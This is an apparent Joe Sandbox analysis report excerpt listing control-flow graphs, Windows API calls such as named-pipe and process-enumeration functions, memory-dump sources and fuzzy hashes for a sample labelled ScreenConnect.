                                                                                                                          control_flow_graph 0 4fdd36c-4fdd3f6 9 4fdd3f8-4fdd3fa 0->9 10 4fdd401-4fdd40d 0->10 9->10 12 4fdd40f-4fdd416 10->12 13 4fdd418-4fdd41a 10->13 12->13 14 4fdd41c-4fdd423 12->14 15 4fdd428-4fdd450 13->15 16 4fdd425 14->16 17 4fdd482-4fdd4da 14->17 19 4fdd459 15->19 20 4fdd452-4fdd457 15->20 16->15 24 4fdd4dc-4fdd4df 17->24 25 4fdd4e2-4fdd547 CreateNamedPipeW 17->25 23 4fdd45e-4fdd473 call 4fdd06c 19->23 20->23 27 4fdd478-4fdd47f 23->27 24->25 29 4fdd549-4fdd54f 25->29 30 4fdd550-4fdd571 25->30 29->30
                                                                                                                          APIs
                                                                                                                          • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04FDD534
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2946932055.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_4fd0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                          • String ID: 4L^q$d/dq
                                                                                                                          • API String ID: 2489174969-3455392024
                                                                                                                          • Opcode ID: bfdf07f892fd97e655cca4416b7873bd45d93db6c890b0015e0b6bc591b2bda2
                                                                                                                          • Instruction ID: ef0bbc09520181a82102de36563a68e3bb3fcc95270e4d68911274e67c491482
                                                                                                                          • Opcode Fuzzy Hash: bfdf07f892fd97e655cca4416b7873bd45d93db6c890b0015e0b6bc591b2bda2
                                                                                                                          • Instruction Fuzzy Hash: 9561B171A003089FDB15DFA9D844B9EBBF6FF89310F14806AE508EB391D775A906CB61

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 239 5830595-58305fc 241 5830650-58306d3 CreateFileA 239->241 242 58305fe-5830623 239->242 251 58306d5-58306db 241->251 252 58306dc-583071a 241->252 242->241 245 5830625-5830627 242->245 247 583064a-583064d 245->247 248 5830629-5830633 245->248 247->241 249 5830637-5830646 248->249 250 5830635 248->250 249->249 253 5830648 249->253 250->249 251->252 257 583072a 252->257 258 583071c-5830720 252->258 253->247 260 583072b 257->260 258->257 259 5830722 258->259 259->257 260->260
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 058306BD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: 4L^q
                                                                                                                          • API String ID: 823142352-616035646
                                                                                                                          • Opcode ID: 7167c015986f78127c8dbff2ce7e2b44dce75c3ea924d33ff09d32b527545cc0
                                                                                                                          • Instruction ID: fb709af855eab87f40481ac95b176bf38d8cdcc9c69049789d59a0ff35c20272
                                                                                                                          • Opcode Fuzzy Hash: 7167c015986f78127c8dbff2ce7e2b44dce75c3ea924d33ff09d32b527545cc0
                                                                                                                          • Instruction Fuzzy Hash: 9A5104B1D00349DFDB14CFA9C889B9EBBF2BB48304F248129E819EB255D7759845CF91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 261 58305a0-58305fc 262 5830650-58306d3 CreateFileA 261->262 263 58305fe-5830623 261->263 272 58306d5-58306db 262->272 273 58306dc-583071a 262->273 263->262 266 5830625-5830627 263->266 268 583064a-583064d 266->268 269 5830629-5830633 266->269 268->262 270 5830637-5830646 269->270 271 5830635 269->271 270->270 274 5830648 270->274 271->270 272->273 278 583072a 273->278 279 583071c-5830720 273->279 274->268 281 583072b 278->281 279->278 280 5830722 279->280 280->278 281->281
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 058306BD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: 4L^q
                                                                                                                          • API String ID: 823142352-616035646
                                                                                                                          • Opcode ID: be8bdf6295bd807e8eee3f44126358dd8a5949527be37b039168e6c481c29ff2
                                                                                                                          • Instruction ID: 05e102e85674c513639355b8e1d8d9ee633d62bedac5c44b191efa2995940373
                                                                                                                          • Opcode Fuzzy Hash: be8bdf6295bd807e8eee3f44126358dd8a5949527be37b039168e6c481c29ff2
                                                                                                                          • Instruction Fuzzy Hash: 7F4114B1D00349DFDB14CFA9C889B9EBBF2BB48304F248129E819EB295D7759845CF91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 672 1f6c6ff-1f6c726 673 1f6ca57-1f6ca5e 672->673 674 1f6c72c-1f6c744 672->674 677 1f6c766-1f6c781 674->677 678 1f6c746-1f6c761 674->678 733 1f6c786 call 1f6cbc0 677->733 734 1f6c786 call 1f6cbb0 677->734 683 1f6c80e-1f6c811 678->683 735 1f6c816 call 1f6f950 683->735 736 1f6c816 call 1f6f94f 683->736 684 1f6c78c-1f6c7d4 737 1f6c7d7 call 1f6ed38 684->737 738 1f6c7d7 call 1f6ed28 684->738 685 1f6c81c-1f6c823 686 1f6ca2b-1f6ca3e 685->686 687 1f6c829-1f6c83f call 1f65c2c 685->687 690 1f6ca45-1f6ca49 686->690 695 1f6c857-1f6c880 687->695 696 1f6c841-1f6c847 687->696 693 1f6ca54 690->693 694 1f6ca4b 690->694 693->673 694->693 695->686 704 1f6c886-1f6c88c 695->704 697 1f6c84b-1f6c84d 696->697 698 1f6c849 696->698 697->695 698->695 699 1f6c7da-1f6c800 705 1f6c802 699->705 706 1f6c80b 699->706 707 1f6c892-1f6c8a9 704->707 708 1f6ca40 704->708 705->706 706->683 707->708 710 1f6c8af-1f6c8d3 707->710 708->690 713 1f6ca1e-1f6ca25 710->713 714 1f6c8d9-1f6c972 call 1f6aab0 call 1f6b5a8 710->714 713->686 713->704 714->686 721 1f6c978-1f6c986 714->721 723 1f6c9b1-1f6c9c8 721->723 724 1f6c988-1f6c9ac 721->724 739 1f6c9cb call 1f6f9e0 723->739 740 1f6c9cb call 1f6fa08 723->740 724->690 727 1f6c9d1-1f6c9f1 730 1f6c9fa-1f6ca1c call 1f65c3c 727->730 730->690 733->684 734->684 735->685 736->685 737->699 738->699 739->727 740->727
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $^q$$^q
                                                                                                                          • API String ID: 0-355816377
                                                                                                                          • Opcode ID: 75e3963466e88f32bc33ac519ab415dce9030341da2b1fa4696e8e8e4360c467
                                                                                                                          • Instruction ID: b397f9860e1b14250a4929f066eb0f467b60e3ad1fe7eb8a70afb3fb4a87c1ea
                                                                                                                          • Opcode Fuzzy Hash: 75e3963466e88f32bc33ac519ab415dce9030341da2b1fa4696e8e8e4360c467
                                                                                                                          • Instruction Fuzzy Hash: 47A16030E00709DFDB14EFA8C454AADBBB2FF88300F108559D49AAB365DB759D85CB81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 790 1f6ef78-1f6ef97 791 1f6ef9d-1f6efa6 790->791 792 1f6f1c8-1f6f1ed 790->792 795 1f6f1f4-1f6f233 791->795 796 1f6efac-1f6f010 791->796 792->795 807 1f6f012-1f6f037 796->807 808 1f6f03a-1f6f043 796->808 807->808 809 1f6f045 808->809 810 1f6f048-1f6f05d 808->810 809->810 851 1f6f05e call 1f6f640 810->851 852 1f6f05e call 1f6f630 810->852 813 1f6f064-1f6f066 815 1f6f0c3-1f6f0d0 813->815 816 1f6f068-1f6f06d 813->816 821 1f6f0d2-1f6f0db 815->821 822 1f6f0dd 815->822 817 1f6f06f-1f6f0a4 816->817 818 1f6f0a9-1f6f0bc 816->818 829 1f6f168-1f6f17c 817->829 818->815 824 1f6f0e2-1f6f0e4 821->824 822->824 826 1f6f0e6-1f6f112 824->826 827 1f6f119-1f6f161 824->827 826->827 827->829 834 1f6f186-1f6f18b 829->834 835 1f6f17e 829->835 837 1f6f195-1f6f19a 834->837 838 1f6f18d 834->838 835->834 841 1f6f1af 837->841 842 1f6f19c-1f6f1aa call 1f6e9f4 call 1f6ea0c 837->842 838->837 841->792 842->841 851->813 852->813
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (&^q$(bq
                                                                                                                          • API String ID: 0-1294341849
                                                                                                                          • Opcode ID: 48b1b1dce92f92eb57dc938f4f4ee05506c471e6b1921e90706ac3b0c96f78b6
                                                                                                                          • Instruction ID: 2990a6c28bd36ad3712cee38096512786ec9e1ded1211da4789487af3ba3451c
                                                                                                                          • Opcode Fuzzy Hash: 48b1b1dce92f92eb57dc938f4f4ee05506c471e6b1921e90706ac3b0c96f78b6
                                                                                                                          • Instruction Fuzzy Hash: A561C231F002199BDB14EFB8D4A06EE7AB6BFD9740F148529D406BB380DE35AD46CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 853 1f65dc0-1f65dc8 855 1f65e16-1f65e4f call 1f60420 853->855 856 1f65dca-1f65dd3 853->856 864 1f65e55-1f65e60 855->864 865 1f65fda-1f65fe1 855->865 856->855 864->865 867 1f65e66-1f65e7d call 1f659e0 864->867 870 1f65ec0-1f65ecf 867->870 871 1f65e7f-1f65e95 867->871 876 1f65ed1-1f65edd 870->876 877 1f65edf-1f65ee8 870->877 874 1f65e97 871->874 875 1f65e9e-1f65ebe 871->875 874->875 875->870 876->877 878 1f65f12-1f65f17 877->878 879 1f65eea-1f65f10 877->879 883 1f65f1f-1f65f35 878->883 879->878 889 1f65f37-1f65f5e 883->889 890 1f65fa5-1f65fbe 883->890 897 1f65f60-1f65f87 889->897 898 1f65f98-1f65fa3 889->898 893 1f65fc0 890->893 894 1f65fc9 890->894 893->894 894->865 897->898 903 1f65f89-1f65f96 897->903 898->889 898->890 903->890
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `qq$nCvq
                                                                                                                          • API String ID: 0-1861623134
                                                                                                                          • Opcode ID: 7ba8e07b992dcebf788ba820bcd7f273a4fd9a420c80378dffd386c3467a5672
                                                                                                                          • Instruction ID: b9d7b53d13f3f00bace4b9c5d95cdaee5ea834d987a1e5e4ee258a1931f12cf0
                                                                                                                          • Opcode Fuzzy Hash: 7ba8e07b992dcebf788ba820bcd7f273a4fd9a420c80378dffd386c3467a5672
                                                                                                                          • Instruction Fuzzy Hash: 35418C70B00202CFDB15EB79C89466E77E6FF88245B148868E506EB365EF31EC42CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 905 1f64c6c-1f64cb3 910 1f64cb5-1f64cc4 call 1f64848 905->910 911 1f64d02-1f64d08 905->911 914 1f64cc6-1f64ccb 910->914 915 1f64d09-1f64dd8 910->915 928 1f64cce call 1f652f8 914->928 929 1f64cce call 1f652e8 914->929 921 1f64de1-1f64e24 915->921 922 1f64dda-1f64de0 915->922 916 1f64cd4 916->911 926 1f64e26 921->926 927 1f64e2b-1f64e32 921->927 922->921 926->927 928->916 929->916
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `Q^q$`Q^q
                                                                                                                          • API String ID: 0-4048626156
                                                                                                                          • Opcode ID: 59088a60b63a76bd77c3c58e1b6da684bdb8325877ef29bf521b1946c26ce871
                                                                                                                          • Instruction ID: 8c972e8e3fa1ffa094f9ff4fa717fa277380e400ad07a006146c9da813558637
                                                                                                                          • Opcode Fuzzy Hash: 59088a60b63a76bd77c3c58e1b6da684bdb8325877ef29bf521b1946c26ce871
                                                                                                                          • Instruction Fuzzy Hash: 40418E71E002199FDB61AF68C8187AEBBB9FB44310F1044E9D50DA7280DB755A49CFA2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 930 1f65410-1f6541b 931 1f65421-1f65423 930->931 932 1f65425-1f6542b 931->932 933 1f6543b-1f6543c 931->933 934 1f6542f-1f65431 932->934 935 1f6542d 932->935 934->933 935->933
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $^q$$^q
                                                                                                                          • API String ID: 0-355816377
                                                                                                                          • Opcode ID: 6edb481c493a374f7cbe451d135aeab4e0e455239c4ff14c0b56cdf6f5b55768
                                                                                                                          • Instruction ID: 9453cca06d34c8733b7966f03e940d419916876851607fccbe45f3e4234fa0b9
                                                                                                                          • Opcode Fuzzy Hash: 6edb481c493a374f7cbe451d135aeab4e0e455239c4ff14c0b56cdf6f5b55768
                                                                                                                          • Instruction Fuzzy Hash: 88D05E30B0060CCF972CDE6AD554A1133E87B48A4236104E9D5098F236CF32EC42C651

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1217 6393768-639377d 1218 639377f-6393782 1217->1218 1219 6393792-6393799 1217->1219 1220 6393788-6393791 1218->1220 1221 639384c-6393860 1218->1221 1222 639379e-63937e2 call 639295c 1219->1222 1223 6393862 1221->1223 1224 6393826-639382f 1221->1224 1241 63937e7-63937ec 1222->1241 1228 639386e-6393877 1223->1228 1226 639388c-63938ee 1224->1226 1227 6393831-639384b 1224->1227 1233 63938fa-6393930 K32EnumProcesses 1226->1233 1234 63938f0-63938f8 1226->1234 1235 6393939-6393961 1233->1235 1236 6393932-6393938 1233->1236 1234->1233 1236->1235 1242 6393878-6393885 1241->1242 1243 63937f2-63937f5 1241->1243 1242->1226 1244 6393864-6393869 1243->1244 1245 63937f7-6393824 1243->1245 1244->1222 1245->1224 1245->1228
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5cc6fab539181e19251c6bd043b44d36364ee1003075f424e9457ad03aab5420
                                                                                                                          • Instruction ID: 3821892a3d8f777eb7c39bb7519279bce4e7dd09c448985a1fac83cb50372c71
                                                                                                                          • Opcode Fuzzy Hash: 5cc6fab539181e19251c6bd043b44d36364ee1003075f424e9457ad03aab5420
                                                                                                                          • Instruction Fuzzy Hash: C65170B1A007098FDB24DF69D88469EBBF5FF88310F10892DD469D7641D734E945CBA1
                                                                                                                          APIs
                                                                                                                          • ConnectNamedPipe.KERNEL32(00000000), ref: 058300B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2191148154-0
                                                                                                                          • Opcode ID: 24ec45b5628b940111ffaab6d08ca858021d638d768f8e8b00aaf1533106a786
                                                                                                                          • Instruction ID: 21a1c59d2b29fab89b64836a2ff468097a7e76983c82555b5487ed53af15f2ef
                                                                                                                          • Opcode Fuzzy Hash: 24ec45b5628b940111ffaab6d08ca858021d638d768f8e8b00aaf1533106a786
                                                                                                                          • Instruction Fuzzy Hash: 1A3137B5D053888FCB15CFA9C995B9DBFF1AF09300F14809AD849EB352D6749845CFA1
                                                                                                                          APIs
                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessSession
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3779259828-0
                                                                                                                          • Opcode ID: bd182d3b829278e1633ea8aa665bc1f3205f1e24fca1956ca1fa5d33a1e0b81b
                                                                                                                          • Instruction ID: 51608d536c7c96972a45c25818228bf0513940da4c916d70d0dbdcbc9e87741f
                                                                                                                          • Opcode Fuzzy Hash: bd182d3b829278e1633ea8aa665bc1f3205f1e24fca1956ca1fa5d33a1e0b81b
                                                                                                                          • Instruction Fuzzy Hash: 722145B58003499FCB10CFAAC845ADEBBF4FF48320F14855AD469B7241C739A945CFA6
                                                                                                                          APIs
                                                                                                                          • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0639391D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumProcesses
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 84517404-0
                                                                                                                          • Opcode ID: 959ec2cfd8e3bb128ccd753908370becdb04b2c8f04db44414c134d666793341
                                                                                                                          • Instruction ID: 2349ceee94639a195a6e06255df7859e0ddfc83a866e583d699d0c68e34101cf
                                                                                                                          • Opcode Fuzzy Hash: 959ec2cfd8e3bb128ccd753908370becdb04b2c8f04db44414c134d666793341
                                                                                                                          • Instruction Fuzzy Hash: A12114B5D002099FEB14CF9AC885B9EBBF5FB48320F50842EE519A7240C738A945CFA5
                                                                                                                          APIs
                                                                                                                          • ConnectNamedPipe.KERNEL32(00000000), ref: 058300B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2191148154-0
                                                                                                                          • Opcode ID: ef7d05d0bdc2c9c7e3f007c94cfd7c8bcd4a4ef58e5c91f0d7d78d9a8af7c4ac
                                                                                                                          • Instruction ID: 5ba6983d21427163f73a4725e7811755e1ab45fa5299e228393096abb6054e56
                                                                                                                          • Opcode Fuzzy Hash: ef7d05d0bdc2c9c7e3f007c94cfd7c8bcd4a4ef58e5c91f0d7d78d9a8af7c4ac
                                                                                                                          • Instruction Fuzzy Hash: 9D2104B0D00258DFCB24DF9AC499B9EBBF5BF48300F148059E819A7340DB749945CFA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          • Opcode ID: 5d61ed0f8e8695795d2d8861a3b526321228a02d2dc347e9d2d8736ecd032545
                                                                                                                          • Instruction ID: 3387ad37ded5be0319442c2e2768a4d76d20f5063e7881a72b4c65382e30ca2f
                                                                                                                          • Opcode Fuzzy Hash: 5d61ed0f8e8695795d2d8861a3b526321228a02d2dc347e9d2d8736ecd032545
                                                                                                                          • Instruction Fuzzy Hash: 7FD15A74A00615CFCB04DF68D894A99BBB6FF9D304B108659E909AB365DB31FC86CF90
                                                                                                                          APIs
                                                                                                                          • WaitNamedPipeW.KERNEL32(00000000), ref: 0583048F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: NamedPipeWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3146367894-0
                                                                                                                          • Opcode ID: a09c0a7a8ce2ca21e0bd337c123c2469055f513e5235b1f33cf73d343b066eb4
                                                                                                                          • Instruction ID: a92a290e76f3e1eb13b6ee514790649df5725b40c3f4e97250b7fb69c2ec2feb
                                                                                                                          • Opcode Fuzzy Hash: a09c0a7a8ce2ca21e0bd337c123c2469055f513e5235b1f33cf73d343b066eb4
                                                                                                                          • Instruction Fuzzy Hash: 8A21E5B68003098FCB14CF9AC445BDEBBF5FB88324F14842DD969A7241C779AA45CFA5
                                                                                                                          APIs
                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessSession
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3779259828-0
                                                                                                                          • Opcode ID: 37270c6bc702650c496712a02781062c17415c73aa39f886c64228c82278738f
                                                                                                                          • Instruction ID: 876a8831d0f334e2594e34753391eccfe39ee6c48234e3d1600d8a0044dd3426
                                                                                                                          • Opcode Fuzzy Hash: 37270c6bc702650c496712a02781062c17415c73aa39f886c64228c82278738f
                                                                                                                          • Instruction Fuzzy Hash: 8911FFB58006499FCB20DF9AC845ADEBBF4FB48320F14842AD469A3241D779A545CFA6
                                                                                                                          APIs
                                                                                                                          • WaitNamedPipeW.KERNEL32(00000000), ref: 0583048F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: NamedPipeWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3146367894-0
                                                                                                                          • Opcode ID: d3681e7f3b82ec92f2b3dfb0fc39707d461b07391f2d1ea41c04b8f26fffaf34
                                                                                                                          • Instruction ID: 4a31f90fcc00b8d2ff93b3b4a13aab9c44611923b474fde01a7fa718d6c05cb9
                                                                                                                          • Opcode Fuzzy Hash: d3681e7f3b82ec92f2b3dfb0fc39707d461b07391f2d1ea41c04b8f26fffaf34
                                                                                                                          • Instruction Fuzzy Hash: C42106B68003098FCB14CF9AC449ADEBBF5FB48324F14842DD969A7241C779AA45CFA1
                                                                                                                          APIs
                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessSession
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3779259828-0
                                                                                                                          • Opcode ID: 5537746c6dc1cdc80bdb08f6acb3b943a782e3aafea13bc4798e681188ba4061
                                                                                                                          • Instruction ID: fa04717b35a48e0d6ece2848996df3783a166faa9abe1d00cda0e82e5baafb7c
                                                                                                                          • Opcode Fuzzy Hash: 5537746c6dc1cdc80bdb08f6acb3b943a782e3aafea13bc4798e681188ba4061
                                                                                                                          • Instruction Fuzzy Hash: 871103B5C002498FDB20DF9AC844BDEBBF4FB48320F108469D559A7241D778A945CFA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: d179ff5bc01e85af3cc51e8d9c7de2c58a9f82e65de1b7d900a30d47e8dc72df
                                                                                                                          • Instruction ID: 4a2df8413bf574801dfd1b12518139d994c2034c0b0bf468f28448286df47f3c
                                                                                                                          • Opcode Fuzzy Hash: d179ff5bc01e85af3cc51e8d9c7de2c58a9f82e65de1b7d900a30d47e8dc72df
                                                                                                                          • Instruction Fuzzy Hash: D7611474B10605DFDB14DFA9D8949AEB7F6FF8D315B108098E506AB365DB31EC029B80
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LR^q
                                                                                                                          • API String ID: 0-2625958711
                                                                                                                          • Opcode ID: aaa1db1d482a1cbb17f65564bc697cec1a6fef440086bf3dd379016db16cf22f
                                                                                                                          • Instruction ID: 1fa4c3e28f7af57e618efba8701384029ad6b6e0aa89ef6597b25600962c7f66
                                                                                                                          • Opcode Fuzzy Hash: aaa1db1d482a1cbb17f65564bc697cec1a6fef440086bf3dd379016db16cf22f
                                                                                                                          • Instruction Fuzzy Hash: 2451F430B01211DFDB299B78D45476EBBF6BF84704F18892AE856EB291DB31DC85CB81
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: nCvq
                                                                                                                          • API String ID: 0-3590779759
                                                                                                                          • Opcode ID: 818f278cb7852afe4b680726ebf66de3ef68a74acfdce48e6afcd0d3e63154d0
                                                                                                                          • Instruction ID: 822d6d397dab8fa411e64eb6c7b785362b4c8bb6db4cc6789fc81cad49d4a3f7
                                                                                                                          • Opcode Fuzzy Hash: 818f278cb7852afe4b680726ebf66de3ef68a74acfdce48e6afcd0d3e63154d0
                                                                                                                          • Instruction Fuzzy Hash: 0A51A170700206CFDB14EB79D85466E77E6FF88255B108468E506EB365EF31ED42CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
